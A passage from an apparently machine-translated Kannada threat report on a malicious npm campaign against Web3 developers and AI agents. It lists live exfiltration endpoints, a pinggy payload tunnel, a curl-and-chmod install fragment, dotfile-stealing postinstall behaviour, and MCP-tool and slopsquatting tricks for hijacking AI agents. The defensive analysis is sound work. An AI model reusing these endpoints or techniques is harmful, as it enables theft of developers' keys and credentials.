eth-wallet-sentinel | 1.0.9 | ಹೌದು |
deployment-key-auditor | 0.7.3 | ಹೌದು |
defi-threat-scanner | 2.1.2 | ಹೌದು |
crypto-credential-scanner | 2.0.2 | ಹೌದು |
chain-key-validator | 0.2.3 | ಹೌದು |
### ರೂಪಾಂತರ ಬಿ — ಪಿಂಗಿ ಸುರಂಗ https.get → exec (ಈ ವರದಿಗೆ ಮೊದಲು ಯಾವುದೇ ಪತ್ತೆ-ಫೀಡ್ ಗೋಚರತೆ ಇಲ್ಲ)
| ಪ್ಯಾಕೇಜ್ | ಆವೃತ್ತಿ | ಫ್ಲೇವರ್ ಅನ್ನು ಸ್ಥಾಪಿಸಿ |
|---|---|---|
truffle-config-helper | 1.7.0 | https.get → exec(stdout) |
chainlink-price-feed-aggregator | 1.1.12 | https.get telemetry call |
ganache-cli-provider | 1.7.51 | https.get telemetry call |
solana-pda-helper | 1.0.46 | https.get telemetry call |
foundry-deploy-helper | 1.8.96 | curl + chmod +x /tmp/.node-cache & |
### ರೂಪಾಂತರ ಸಿ — ನಿಷ್ಕ್ರಿಯ, ರನ್ಟೈಮ್ ಟ್ರಿಗ್ಗರ್ ಶಂಕಿಸಲಾಗಿದೆ (ಈ ವರದಿಗೆ ಮೊದಲು ಯಾವುದೇ ಪತ್ತೆ-ಫೀಡ್ ಗೋಚರತೆ ಇಲ್ಲ)
| ಪ್ಯಾಕೇಜ್ | ಆವೃತ್ತಿ | ಟಿಪ್ಪಣಿಗಳು |
|---|---|---|
wallet-backup-verifier | 1.0.1 | |
env-security-scanner | 1.6.0 | |
foundy-toolkit | 1.5.79 | ಫೌಂಡ್ರಿಯ ಟೈಪೊಸ್ಕ್ವಾಟ್ |
solna-web3 | 1.5.98 | ಸೋಲಾನಾದ ಟೈಪೊಸ್ಕ್ವಾಟ್ |
wallet-security-checker | 1.0.3 | |
hardhat-gas-profiler-plugin | 1.7.86 | |
ethers-multicall-utils | 1.3.15 | |
defi-env-auditor | 0.3.2 | |
etherjs-utils | 1.0.39 |
ರೂಪಾಂತರ-A ಮತ್ತು ರೂಪಾಂತರ-B ಕಾಲಮ್ಗಳನ್ನು ಯಾದೃಚ್ಛಿಕವಾಗಿ ಆಯ್ಕೆ ಮಾಡಲಾಗಿಲ್ಲ. ರೂಪಾಂತರ-A ಹೆಸರುಗಳೆಲ್ಲವೂ ತಮ್ಮನ್ನು ತಾವು ಹೀಗೆ ಮಾರಾಟ ಮಾಡಿಕೊಳ್ಳುತ್ತವೆ ಭದ್ರತಾ ಲೆಕ್ಕಪರಿಶೋಧನಾ ಪರಿಕರಗಳು — “ಸುರಕ್ಷತಾ ಪರಿಶೀಲನೆ”, “ಗಾರ್ಡ್ ನಿಯೋಜಿಸಿ”, “ರಹಸ್ಯ ಪತ್ತೆಕಾರಕ”, “ವ್ಯಾಲೆಟ್ ಸೆಂಟಿನೆಲ್”, “ಕೀ ಆಡಿಟರ್”, “ಬೆದರಿಕೆ ಸ್ಕ್ಯಾನರ್”, “ಕ್ರೆಡೆನ್ಶಿಯಲ್ ಸ್ಕ್ಯಾನರ್”, “ಚೈನ್ ಕೀ ವ್ಯಾಲಿಡೇಟರ್”. ಅವು ವೆಬ್3 ಯೋಜನೆಯ ಸುರಕ್ಷತೆಯನ್ನು ಮೌಲ್ಯಮಾಪನ ಮಾಡಲು ಒಂದು ಸಾಧನವನ್ನು ಹುಡುಕುವ ಡೆವಲಪರ್ ಅಥವಾ AI ಏಜೆಂಟ್ ಅನ್ನು ಗುರಿಯಾಗಿರಿಸಿಕೊಂಡಿವೆ. ವೇರಿಯಂಟ್-ಬಿ ಹೆಸರುಗಳೆಲ್ಲವೂ ತಮ್ಮನ್ನು ತಾವು ಹೀಗೆ ಮಾರಾಟ ಮಾಡಿಕೊಳ್ಳುತ್ತವೆ ನಿರ್ಮಾಣ ಮತ್ತು ನಿಯೋಜನೆ ಸಹಾಯಕರು ಅದೇ ವೆಬ್3 ಪರಿಸರ ವ್ಯವಸ್ಥೆಗೆ - ಟ್ರಫಲ್, ಚೈನ್ಲಿಂಕ್, ಗಾನಚೆ, ಸೋಲಾನಾ ಪಿಡಿಎ ಟೂಲಿಂಗ್, ಫೌಂಡ್ರಿ. ಈ ವಿಭಜನೆಯು ಸಾಮಾನ್ಯ ವೆಬ್3 ಡೆವಲಪರ್ನ "ಆಡಿಟ್ ಹಂತ" ಮತ್ತು "ನಿಯೋಜನಾ ಹಂತ" ದ ಮಾನಸಿಕ ಮಾದರಿಯನ್ನು ಪ್ರತಿಬಿಂಬಿಸುತ್ತದೆ. ನೀವು ಯಾವುದೇ ಹಂತವನ್ನು ತಲುಪಿದರೂ, ಪ್ರಕಾಶಕರು ಅದಕ್ಕಾಗಿ ಒಂದು ಬಲೆ ಪ್ಯಾಕ್ ಮಾಡಿದ್ದಾರೆ.
ರಾಜಿ ಸೂಚಕಗಳು
ನೆಟ್ವರ್ಕ್ ಮತ್ತು ಫೈಲ್ಗಳು
| ಐಒಸಿ | ಭಿನ್ನ | ಉದ್ದೇಶ |
|---|---|---|
https://ddjidd564.github.io/defi-security-best-practices/config.json | A | ಗಿಟ್ಹಬ್ ಪುಟಗಳ ಮೂಲಕ ಹೋಸ್ಟ್ ಮಾಡಲಾದ ಡೈನಾಮಿಕ್ ವೆಬ್ಹುಕ್ ಪರಿಹಾರಕ. |
https://webhook.site/8d334534-1c63-4f4f-a0d7-95c446c8b233 | A | ಪ್ರಸ್ತುತ ಹೊರಹರಿವು ಸಂಗ್ರಾಹಕ ಎಂಡ್ಪಾಯಿಂಟ್, ಫಾಲ್ಬ್ಯಾಕ್ ಆಗಿ ಸಹ ಎಂಬೆಡ್ ಮಾಡಲಾಗಿದೆ. |
rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link/npm/-/binary/telemetry | B | ರಿಮೋಟ್ ಬೈನರಿ ಪೇಲೋಡ್ಗಳನ್ನು ವಿತರಿಸಲು ಬಳಸಲಾಗುವ ಪಿಂಗಿ ಸುರಂಗ. |
scanner.js MD5 b461106e47a1f5966159cd6e92541505 | A | ಎಲ್ಲಾ 8 ವೇರಿಯಂಟ್-ಎ ಪ್ಯಾಕೇಜ್ಗಳಲ್ಲಿ ಒಂದೇ ರೀತಿಯ ಸ್ಕ್ಯಾನರ್ ಪೇಲೋಡ್ ಅನ್ನು ಮರುಬಳಕೆ ಮಾಡಲಾಗಿದೆ. |
/tmp/.node-cache | B | ಬೇರ್ಪಡಿಸಲಾದ ಕಾರ್ಯಗತಗೊಳ್ಳುವಿಕೆಯನ್ನು ಕೈಬಿಡಲಾಗಿದೆ foundry-deploy-helper:1.8.96. |
ಪ್ರಕಾಶಕ
- npm ಬಳಕೆದಾರಹೆಸರು: ಡಿಡಿಜಿಡ್5640
- ಇಮೇಲ್: 1623682356@qq.com (ಪರಿಶೀಲಿಸದ)
- ಇಮೇಲ್ ಮತ್ತು SCM ಪರಿಶೀಲನೆ: ಯಾವುದೂ ಇಲ್ಲ
- ಖಾತೆಯಲ್ಲಿರುವ ಪ್ಯಾಕೇಜ್ಗಳು: 22, ಮೇಲಿನ ಕ್ಯಾಟಲಾಗ್ನಲ್ಲಿ ಪಟ್ಟಿ ಮಾಡಲಾದ ಎಲ್ಲವೂ.
- ಆರಂಭಿಕ ಗೋಚರ ಚಟುವಟಿಕೆ: ಚೈನ್-ಕೀ-ವ್ಯಾಲಿಡೇಟರ್:0.2.3 (ರೂಪಾಂತರ A)
- ಇತ್ತೀಚಿನ ಗೋಚರ ಚಟುವಟಿಕೆ: ಚೈನ್-ಕೀ-ವ್ಯಾಲಿಡೇಟರ್:0.2.3 ಮತ್ತು ಕ್ರಿಪ್ಟೋ-ಕ್ರೆಡೆನ್ಶಿಯಲ್-ಸ್ಕ್ಯಾನರ್:2.0.2 (ಎರಡೂ ಈ ಬರವಣಿಗೆಗೆ 24 ಗಂಟೆಗಳ ಮೊದಲು)
ಬ್ರ್ಯಾಂಡ್ ಮುಂಭಾಗಗಳು (ಬಳಸಲಾಗಿದೆ ಲೇಖಕ / README / ನಕಲಿ GH ಸಂಸ್ಥೆ)
- "ಕ್ರಿಪ್ಟೋ ಸೆಕ್ಯುರಿಟಿ ಗಿಲ್ಡ್" - ಖಾಲಿ ಗಿಟ್ಹಬ್ ಸಂಸ್ಥೆಯಿಂದ ಬೆಂಬಲಿತವಾಗಿದೆ ಕ್ರಿಪ್ಟೋಸೆಕ್-ಗಿಲ್ಡ್
- “Web3 ಆಡಿಟ್ ಕಲೆಕ್ಟಿವ್” — ಖಾಲಿ GitHub ಸಂಸ್ಥೆಯಿಂದ ಬೆಂಬಲಿತವಾಗಿದೆ w3ಆಡಿಟ್
- "DeFi ಸೆಕ್ಯುರಿಟಿ ಅಲೈಯನ್ಸ್" - ಖಾಲಿ GitHub ಸಂಸ್ಥೆಯಿಂದ ಬೆಂಬಲಿತವಾಗಿದೆ ಡೆಫಿ-ಭದ್ರತೆ
- ಉಲ್ಲೇಖ GH ಖಾತೆ ddjidd564 — ಡೈನಾಮಿಕ್-ವೆಬ್ಹೂಕ್ config.json ನ ಹೋಸ್ಟ್
ವರ್ತನೆಯ
- ನೋಡ್ -e ಯಾವುದನ್ನಾದರೂ ಓದುವುದನ್ನು ಪೋಸ್ಟ್ಇನ್ಸ್ಟಾಲ್ ಮಾಡಿ .ಸ್ಶ್, .ಎಥೆರಿಯಮ್, .ಬಿಟ್ಕಾಯಿನ್, .env, .ಬಾಶ್_ಹಿಸ್ಟರಿ, .zsh_ಇತಿಹಾಸ, .git-ರುಜುವಾತುಗಳು ಜೊತೆ .ಸ್ಲೈಸ್(0, 200) ಮತ್ತು ಇದರೊಂದಿಗೆ ಜೋಡಿಸುವುದು | ವಿಭಜಕಗಳು ರೂಪಾಂತರ A ಗಾಗಿ ಬಹುತೇಕ ವಿಶಿಷ್ಟವಾದ ಫಿಂಗರ್ಪ್ರಿಂಟ್ ಆಗಿದೆ.
- ಆಮದು ಮಾಡಲಾಗುತ್ತಿದೆ ./ಸ್ಕ್ಯಾನರ್.ಜೆಎಸ್ MCP ಆಗಿ ನೋಂದಾಯಿಸಿಕೊಳ್ಳುವ ಪ್ಯಾಕೇಜ್ನಿಂದ ಸರ್ವರ್ ಹೆಸರಿನ ಪರಿಕರಗಳೊಂದಿಗೆ ಹುಡುಕಾಟ_ಲೀಕ್ಡ್_ರುಜುವಾತುಗಳು ಅಥವಾ ಅದೇ ರೀತಿ ರೂಪಿಸಲಾದ "ಭದ್ರತಾ ಲೆಕ್ಕಪರಿಶೋಧನೆ" ಕ್ರಿಯಾಪದಗಳು ರೂಪಾಂತರ-ಎ ದೃಢೀಕರಣವಾಗಿದೆ.
- ಯಾವುದೇ *.run.pinggy-free.link ಹೋಸ್ಟ್ನಿಂದ ಪಡೆಯುವ ಮತ್ತು ಪ್ರತಿಕ್ರಿಯೆಯನ್ನು child_process.exec ಗೆ ಪೈಪ್ ಮಾಡುವ ನೋಡ್ -e ಪೋಸ್ಟ್ಇನ್ಸ್ಟಾಲ್, ಹೊದಿಕೆಯನ್ನು ಲೆಕ್ಕಿಸದೆ, ರೂಪಾಂತರ-ಬಿ ದೃಢೀಕರಣವಾಗಿದೆ.
ಗುಣಲಕ್ಷಣ ಮತ್ತು ಪ್ರೇರಣೆ
ಪ್ರಕಾಶಕರ ಭಾಗಶಃ ಫಿಂಗರ್ಪ್ರಿಂಟ್ಗೆ ಮೇಜಿನ ಮೇಲೆ ಸಾಕಷ್ಟು ಇದೆ ಮತ್ತು ನಿಜವಾದ ಗುರುತಿಗೆ ಸಾಕಾಗುವುದಿಲ್ಲ. ಇಮೇಲ್ 1623682356@qq.com ಇದು QQ ಮೇಲ್ ವಿಳಾಸವಾಗಿದೆ — ಟೆನ್ಸೆಂಟ್ನ ಉಚಿತ ವೆಬ್ಮೇಲ್, ಚೀನಾದ ಮುಖ್ಯ ಭೂಭಾಗದಲ್ಲಿ ಜನಪ್ರಿಯವಾಗಿದೆ — ಮತ್ತು ಸಂಖ್ಯಾತ್ಮಕ ಸ್ಥಳೀಯ ಭಾಗವು QQ ಬಳಕೆದಾರ ID ಆಗಿದೆ; QQ-ಸ್ವರೂಪದ ವಿಳಾಸಗಳನ್ನು ಕ್ಷುಲ್ಲಕವಾಗಿ ನೋಂದಾಯಿಸಲಾಗಿರುವುದರಿಂದ ನಾವು ಇದನ್ನು ಸಾಫ್ಟ್ ಸಿಗ್ನಲ್ ಎಂದು ಮಾತ್ರ ಪರಿಗಣಿಸುತ್ತೇವೆ. npm ಖಾತೆಯು ಎರಡು-ಅಂಶ ಬಹಿರಂಗಪಡಿಸುವಿಕೆಯನ್ನು ಹೊಂದಿಲ್ಲ, ಪರಿಶೀಲಿಸಿದ ಇಮೇಲ್ ಇಲ್ಲ, ಪರಿಶೀಲಿಸಲಾಗಿಲ್ಲ. SCM ಲಿಂಕ್. “ಕ್ರಿಪ್ಟೋ ಸೆಕ್ಯುರಿಟಿ ಗಿಲ್ಡ್” / “ವೆಬ್3 ಆಡಿಟ್ ಕಲೆಕ್ಟಿವ್” / “ಡಿಫೈ ಸೆಕ್ಯುರಿಟಿ ಅಲೈಯನ್ಸ್” ಬ್ರ್ಯಾಂಡ್ ಟ್ರಯಾಡ್ ಅನ್ನು ಸಗಟು ರೂಪದಲ್ಲಿ ರಚಿಸಲಾಗಿದೆ - ಈ ಅಭಿಯಾನದ ಹೊರಗೆ ಈ ಮೂರರಲ್ಲಿ ಯಾವುದೂ ಅಸ್ತಿತ್ವದಲ್ಲಿಲ್ಲ - ಮತ್ತು ಬೆಂಬಲಿತ ಗಿಟ್ಹಬ್ ಸಂಸ್ಥೆಗಳು npm ಪುಟ ಲಿಂಕ್ಗಳನ್ನು ಜನಪ್ರಿಯಗೊಳಿಸಲು ರಚಿಸಲಾದ ಖಾಲಿ ಶೆಲ್ಗಳಾಗಿವೆ.
ಎರಡು ಮಾದರಿಗಳು ಹೆಸರಿಸಲು ಯೋಗ್ಯವಾಗಿವೆ, ಏಕೆಂದರೆ ಅವು ಪಕ್ಕದ ಅಭಿಯಾನಗಳಲ್ಲಿ ಕಾಣಿಸಿಕೊಳ್ಳುತ್ತವೆ. ಮೊದಲನೆಯದು ಸಾಮಾಜಿಕ ಪುರಾವೆಯಾಗಿ ಬ್ರ್ಯಾಂಡ್ ಪೂರ್ವನಿರ್ಮಿತ: ನಿರ್ವಾಹಕರು ಟೈಪೊಸ್ಕ್ವಾಟ್ ಮಾಡಲು ಅಸ್ತಿತ್ವದಲ್ಲಿರುವ ಯೋಜನೆಯ ಹೆಸರುಗಳನ್ನು ಆಯ್ಕೆ ಮಾಡಲಿಲ್ಲ; ಅವರು ಸಂಪೂರ್ಣ ಟ್ರಸ್ಟ್ ನಿರೂಪಣೆಯನ್ನು ಮೊದಲಿನಿಂದಲೂ ತಯಾರಿಸಿದರು, ಒಂದು ಎಂದು ತಿಳಿದಿದ್ದರು AI-ಏಜೆಂಟ್ ನಿರ್ಮಾಣ pipeline ಅಥವಾ npm ಪುಟವನ್ನು ಸ್ಕ್ಯಾನ್ ಮಾಡುವ ಆತುರದ ಡೆವಲಪರ್ "ಭದ್ರತಾ ಸಂಸ್ಥೆ" ಎಂಬ ಬದಲು "ಭದ್ರತಾ ಸಂಸ್ಥೆಯಂತೆ ಕಾಣುತ್ತದೆ" ಎಂಬ ಮಾದರಿಯಲ್ಲಿ ಹೊಂದಾಣಿಕೆ ಮಾಡುತ್ತಾರೆ. ಇದು ಸ್ಲಾಪ್ಸ್ಕ್ವಾಟಿಂಗ್ ಸಾಹಿತ್ಯವು ಎಚ್ಚರಿಸಿದ ಅದೇ ವಿಧಾನವಾಗಿದೆ - LLM ಹೆಸರಿಗೆ ಟ್ಯೂನ್ ಮಾಡಲಾದ ಪ್ಯಾಕೇಜ್ಗಳು ಆವಿಷ್ಕಾರ Web3 ಭದ್ರತಾ ಪರಿಕರವನ್ನು ಕೇಳಿದರೆ, LLM ಎರಡು ಬಾರಿ ಪರಿಶೀಲಿಸದಷ್ಟು ಚೆನ್ನಾಗಿ ಧರಿಸಿರಬೇಕು. ಸ್ಲೋಪ್ಸ್ಕ್ವಾಟಿಂಗ್ ಅಧಿಕೃತ ಪ್ಯಾಕೇಜ್ ಅಸ್ತಿತ್ವದಲ್ಲಿಲ್ಲದಿದ್ದಾಗ ಪ್ಲೇಸ್ಹೋಲ್ಡರ್ಗಳಾದ LLM ಗಳು ಭ್ರಮೆಗೊಳ್ಳುವಂತೆ ಮಾಡುವ ಹೆಸರುಗಳಿಗೆ ಹೊಂದಿಕೆಯಾಗುವ ದುರುದ್ದೇಶಪೂರಿತ ಪ್ಯಾಕೇಜ್ಗಳಿಗೆ ಇತ್ತೀಚೆಗೆ ರಚಿಸಲಾದ ಪದವಾಗಿದೆ; ಈ ಅಭಿಯಾನವು ಅದರ ಹೆಚ್ಚು ಆಕ್ರಮಣಕಾರಿ ಸೋದರಸಂಬಂಧಿಯಾಗಿದ್ದು, ಅಲ್ಲಿ ಆಪರೇಟರ್ ಪ್ಲೇಸ್ಹೋಲ್ಡರ್ ಸೇರಿರುವ ಸಂಸ್ಥೆಯನ್ನು ಸಹ ರೂಪಿಸುತ್ತಾನೆ.
ಎರಡನೇ ಮಾದರಿಯು MCP-ಸಮಯದ ಸಕ್ರಿಯಗೊಳಿಸುವಿಕೆ. ಹೊತ್ತಿಗೆ ಸ್ಕ್ಯಾನರ್.ಜೆಎಸ್ ರನ್ ಆಗುತ್ತದೆ, ಅನುಸ್ಥಾಪನೆಯು ಮುಗಿದಿದೆ ಮತ್ತು ಡೆವಲಪರ್ ಮುಂದುವರೆದಿದ್ದಾರೆ. ಟ್ರಿಗ್ಗರ್ ಎಂದರೆ ಉಪಕರಣವನ್ನು ಕರೆಯುವ AI ಏಜೆಂಟ್ — ಹುಡುಕಾಟ_ಲೀಕ್ಡ್_ರುಜುವಾತುಗಳು, ರೂಪಾಂತರ-A ಪ್ರಕರಣದಲ್ಲಿ - ಏಜೆಂಟ್ ಅದನ್ನು ಸಂಪೂರ್ಣವಾಗಿ ಮಾಡುತ್ತಾರೆ, ಏಕೆಂದರೆ ಅದು ಪ್ಯಾಕೇಜ್ ಅನ್ನು ನೀಡಿದ ಸಂಪೂರ್ಣ ಕಾರಣವಾಗಿದೆ. ದುರುದ್ದೇಶಪೂರಿತ ಕೆಲಸವು ಈ ಸಮಯದಲ್ಲಿ ನಡೆಯುತ್ತದೆ ಉತ್ತಮ ಡೆವಲಪರ್ ತಮ್ಮ AI ಸಹಾಯಕರು ಕೇಳಿದ ಕೆಲಸದಲ್ಲಿ ಯಶಸ್ವಿಯಾಗುವುದನ್ನು ವೀಕ್ಷಿಸುವ ಸಾಧ್ಯತೆ ಹೆಚ್ಚಿರುವಾಗ, ಕೆಲಸದ ಹರಿವಿನ ಒಂದು ಭಾಗ. ಇದು ಹಳೆಯ "exfil on" ನಿಂದ ವರ್ತನೆಯಲ್ಲಿ ಒಂದು ಸಣ್ಣ ಬದಲಾವಣೆಯಾಗಿದೆ. npm ಸ್ಥಾಪನೆ” ಮಾದರಿಯನ್ನು ಹೊಂದಿದೆ, ಮತ್ತು ಇದು ಅನುಸ್ಥಾಪನಾ ಸಮಯದ ಸ್ಯಾಂಡ್ಬಾಕ್ಸಿಂಗ್ ಅನ್ನು ಅಚ್ಚುಕಟ್ಟಾಗಿ ತಪ್ಪಿಸುತ್ತದೆ.
ನಾವು ಬೆದರಿಕೆ ಒಡ್ಡುವ ವ್ಯಕ್ತಿಯನ್ನು ಹೆಸರಿಸುತ್ತಿಲ್ಲ. ಸಂಕೇತಗಳು (QQ ಇಮೇಲ್, ಏಕ-ಖಾತೆ, 22-ಪ್ಯಾಕೇಜ್ ಏಕ-ದಿನದ ಬರ್ಸ್ಟ್, ಎರಡು ಸಮಾನಾಂತರ C2 ಸ್ಟ್ಯಾಕ್ಗಳು) 2025–2026 ರವರೆಗೆ npm ಟೆಲಿಮೆಟ್ರಿಯಲ್ಲಿ ಗೋಚರಿಸುವ ಒಂದು ನಿರಂತರ ಆಪರೇಟರ್, ಸಣ್ಣ ತಂಡ ಅಥವಾ ಪ್ಯಾಕೇಜ್-ಪ್ರವಾಹ ಸಿಬ್ಬಂದಿಗಳಲ್ಲಿ ಒಂದಕ್ಕೆ ಸಮಾನವಾಗಿ ಸ್ಥಿರವಾಗಿವೆ. ನಾವು ಏನು ಮಾಡಬಹುದು ಈ ಆಪರೇಟರ್ ಸ್ಪಷ್ಟವಾದ ಆದ್ಯತೆಯ ಪರಿಸರ ವ್ಯವಸ್ಥೆಯನ್ನು ಹೊಂದಿದೆ (ಎಥೆರಿಯಮ್ + ಸೋಲಾನಾ + ಫೌಂಡ್ರಿ/ಹರ್ಧತ್ ಟೂಲಿಂಗ್), ಸ್ಪಷ್ಟವಾದ ಆದ್ಯತೆಯ ಬಲಿಪಶು (ವೆಬ್3 ಡೆವಲಪರ್ಗಳು ಮತ್ತು ವೆಬ್3 ಯೋಜನೆಗಳಲ್ಲಿ ಕೆಲಸ ಮಾಡುವ AI ಏಜೆಂಟ್ಗಳು), ಮತ್ತು ಸ್ಪಷ್ಟವಾದ ಆದ್ಯತೆಯ ನಿರಂತರ ಮಾದರಿ (ಎಂಸಿಪಿ-ಟೈಮ್ ರನ್ಟೈಮ್ ಟ್ರಿಗ್ಗರ್ ಜೊತೆಗೆ ಬೇರ್ಪಟ್ಟ ಬೈನರಿ ಫಾಲ್ಬ್ಯಾಕ್).
ಪರಿಣಾಮ, ಪ್ರವೃತ್ತಿಗಳು ಮತ್ತು ರಕ್ಷಕರು ಏನು ಮಾಡಬಹುದು
ನಮ್ಮ ಮುಂಚಿನ ಎಚ್ಚರಿಕೆ pipeline ಹಿಡಿದ 8 ಆಫ್ 22 ಅಭಿಯಾನದ ಜೀವಿತಾವಧಿಯಲ್ಲಿ ಪ್ಯಾಕೇಜ್ಗಳು — ಆರಂಭಿಕ ಸ್ವೀಪ್ನಲ್ಲಿ ಆರು ಮತ್ತು ಅಭಿಯಾನ-ಕ್ಲಸ್ಟರಿಂಗ್ ಪಾಸ್ ಸಮಯದಲ್ಲಿ ಅದೇ ದಿನದ ನಂತರ ಬಂದ ಎರಡು. ಇತರ 14 ಪ್ಯಾಕೇಜ್ಗಳು npm ನಲ್ಲಿ ದಿನಗಳವರೆಗೆ ಲೈವ್ ಆಗಿದ್ದವು. ನಾವು ಮೇಲ್ವಿಚಾರಣೆ ಮಾಡುವ ಯಾವುದೇ ಪತ್ತೆ ಫೀಡ್ಗಳಲ್ಲಿ ಎಂದಿಗೂ ಕಾಣಿಸಿಕೊಳ್ಳದೆ, ಮತ್ತು ಬರೆಯುವ ಸಮಯದಲ್ಲಿ ಸ್ಥಾಪಿಸಬಹುದಾದ ಸ್ಥಿತಿಯಲ್ಲಿಯೇ ಇರುತ್ತದೆ. ಆ ಅಂತರವು ಮುಖ್ಯವಾಗಿದೆ ಏಕೆಂದರೆ:
- ಅನುಸ್ಥಾಪನೆಯ ಸಮಯದಲ್ಲಿ ರೂಪಾಂತರ A ಮೌನವಾಗಿರುತ್ತದೆ. ಡಾಟ್ಫೈಲ್ ಓದುವಿಕೆ ಸಂಭವಿಸುತ್ತದೆ, ಆದರೆ AI ಏಜೆಂಟ್ ಪ್ಯಾಕೇಜ್ನ MCP ಪರಿಕರಗಳನ್ನು ಆಹ್ವಾನಿಸಿದಾಗ ಮಾತ್ರ ಬೃಹತ್ ಎಕ್ಸ್ಫಿಲ್ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ. A standard ಅನುಸ್ಥಾಪನೆಯ ನಂತರ ವೀಕ್ಷಿಸುವ ಸ್ಯಾಂಡ್ಬಾಕ್ಸ್ ನೋಡುತ್ತದೆ ನೋಡ್ -e ನಿರ್ಬಂಧಿಸಿ ಮತ್ತು ಅದು ಚಿಕ್ಕದಾಗಿದೆ ಮತ್ತು ಸ್ಪಷ್ಟವಾಗಿ ಜಡವಾಗಿದೆ ಎಂದು ನಿರ್ಧರಿಸಿ.
- ರೂಪಾಂತರ B ಒಂದು ಏಕ ರೇಖೆಯಾಗಿದೆ. ಮಾಲ್ವೇರ್ ವರ್ಗೀಕರಣಕಾರರಿಂದ ಕಲಿಯಲು ಏನೂ ಇಲ್ಲ - ಯಾವುದೇ ಗೊಂದಲವಿಲ್ಲ, ಎನ್ಕೋಡ್ ಮಾಡಿದ ಪೇಲೋಡ್ ಇಲ್ಲ, ಅನುಮಾನಾಸ್ಪದವಾಗಿ ಕಾಣುವ ಡೊಮೇನ್ ಇಲ್ಲ. ಪಿಂಗ್ಗಿ ಸುರಂಗವು ಕಾನೂನುಬದ್ಧ ಡೆವಲಪರ್ ಸೇವೆಯಾಗಿದೆ. ಒಂದೇ ಒಂದು ಅನುಮಾನಾಸ್ಪದ ವಿಷಯವೆಂದರೆ "ಕಾನ್ಫಿಗರೇಶನ್ ಸಹಾಯಕ" ಮನೆಗೆ ಫೋನ್ ಮಾಡಬೇಕಾಗುತ್ತದೆ.
- ಸಿ ರೂಪಾಂತರವು ಸಂಪೂರ್ಣವಾಗಿ ಸ್ವಚ್ಛವಾಗಿ ಕಾಣುತ್ತದೆ. ಇದಕ್ಕೆ ಯಾವುದೇ ಸ್ಥಾಪನೆ ಇಲ್ಲ. hooksಪ್ರತಿಯೊಂದು ಸ್ಥಿರ ಸಂಕೇತದಿಂದ, ಅದು ಸಾಮಾನ್ಯವಾಗಿದೆ.
MCP-ಟೂಲ್ ಯುಗಕ್ಕಾಗಿ ಒಂದು ಸಣ್ಣ ಡಿಫೆಂಡರ್ ಪರಿಶೀಲನಾಪಟ್ಟಿ
ಈ ಅಭಿಯಾನವನ್ನು ಮೊದಲೇ ಹಿಡಿದಿಡಬಹುದಾದ ಮೂರು ಕಾಂಕ್ರೀಟ್ ಕ್ರಮಗಳು:
- ಪ್ಯಾಕೇಜ್ ಅಲ್ಲ, ಪ್ರಕಾಶಕರ ತೂಕವನ್ನು ಅಳೆಯಿರಿ. ಒಂದೇ ವರ್ಷದ QQ-ಮೇಲ್ ಖಾತೆಯ ಅಡಿಯಲ್ಲಿ ಇಪ್ಪತ್ತೆರಡು ಪ್ಯಾಕೇಜ್ಗಳು ಯಾವುದೇ SCM ಪರಿಶೀಲನೆಯು ಯಾವುದೇ ಪ್ರತಿ-ಪ್ಯಾಕೇಜ್ ವೈಶಿಷ್ಟ್ಯಕ್ಕಿಂತ ಪ್ರಕಾಶಮಾನವಾದ ಸಂಕೇತವಾಗಿದೆ. ಪ್ರಕಾಶಕರ ಫಿಂಗರ್ಪ್ರಿಂಟ್ ಎದ್ದು ಕಾಣುವ ಕಾರಣ ನಮ್ಮ ಮುಂಚಿನ-ಎಚ್ಚರಿಕೆ ಕಾರ್ಯಪ್ರವಾಹವು ಮೊದಲ ಪ್ಯಾಕೇಜ್ಗಳನ್ನು ಸೆಳೆಯಿತು - ಯಾವುದೇ ಸುರಕ್ಷಿತ, ಅನಿರ್ದಿಷ್ಟ ಅಥವಾ ಮಾಲ್ವೇರ್ ಪ್ರತಿ-ಪ್ಯಾಕೇಜ್ ವರ್ಗೀಕರಣಗಳು ಕಡಿಮೆ ತೂಕವನ್ನು ಹೊಂದಿರುವ ಪ್ರಕಾಶಕರ-ಖ್ಯಾತಿ ಸ್ಕೋರ್ ಅನ್ನು ಶಿಫಾರಸು ಮಾಡುತ್ತದೆ.
- ಸಾಬೀತಾಗುವವರೆಗೆ ಡೈನಾಮಿಕ್-ಕಾನ್ಫಿಗ್ ಪರೋಕ್ಷಗಳನ್ನು ದುರುದ್ದೇಶಪೂರಿತವೆಂದು ಪರಿಗಣಿಸಿ. ಮೂರನೇ ವ್ಯಕ್ತಿಯ ಡಾಕ್ಯುಮೆಂಟ್ನಿಂದ (GitHub ಪುಟಗಳು, GitHub Gist, Pastebin, S3 ಆಬ್ಜೆಕ್ಟ್, ಬೇರೆಲ್ಲಿಯಾದರೂ) ರನ್ಟೈಮ್ನಲ್ಲಿ ಅದರ ಹೊರಹೋಗುವ ಎಂಡ್ಪಾಯಿಂಟ್ ಅನ್ನು ಪರಿಹರಿಸುವ ಪ್ಯಾಕೇಜ್ ಟೆಲಿಮೆಟ್ರಿಗೆ ಹಾಗೆ ಮಾಡಲು ಯಾವುದೇ ಕಾನೂನುಬದ್ಧ ಕಾರಣವನ್ನು ಹೊಂದಿಲ್ಲ. ನಿಜವಾದ ಟೆಲಿಮೆಟ್ರಿ ಎಂಡ್ಪಾಯಿಂಟ್ಗಳನ್ನು ಹಾರ್ಡ್ಕೋಡ್ ಮಾಡಲಾಗಿದೆ ಮತ್ತು ದಾಖಲಿಸಲಾಗಿದೆ.
- ಜಾಹೀರಾತು ಮಾಡಲಾದ ಪರಿಕರ ಮೇಲ್ಮೈ ಮೂಲಕ MCP-ಸರ್ವರ್ ಪ್ಯಾಕೇಜ್ಗಳನ್ನು ಆಡಿಟ್ ಮಾಡಿ. ವೇರಿಯಂಟ್-ಎ ಪ್ಯಾಕೇಜ್ಗಳು ಎಲ್ಲಾ ಜಾಹೀರಾತು ಪರಿಕರಗಳನ್ನು ಹೆಸರಿಸಲಾಗಿದೆ
